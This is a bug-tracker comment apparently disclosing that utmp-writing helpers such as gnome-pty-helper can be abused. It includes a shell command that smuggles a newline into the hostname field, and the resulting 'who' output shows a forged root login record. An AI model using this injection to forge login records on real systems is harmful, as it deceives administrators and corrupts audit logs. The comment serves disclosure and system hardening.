Comment 38 for bug 22052
Revision history for this message
|
|
#38 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
f33e652
(Get the code!)
I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.
In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that
psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$
should suitably freak them out.
Cheers,
Paul Szabo <email address hidden> http://
School of Mathematics and Statistics University of Sydney Australia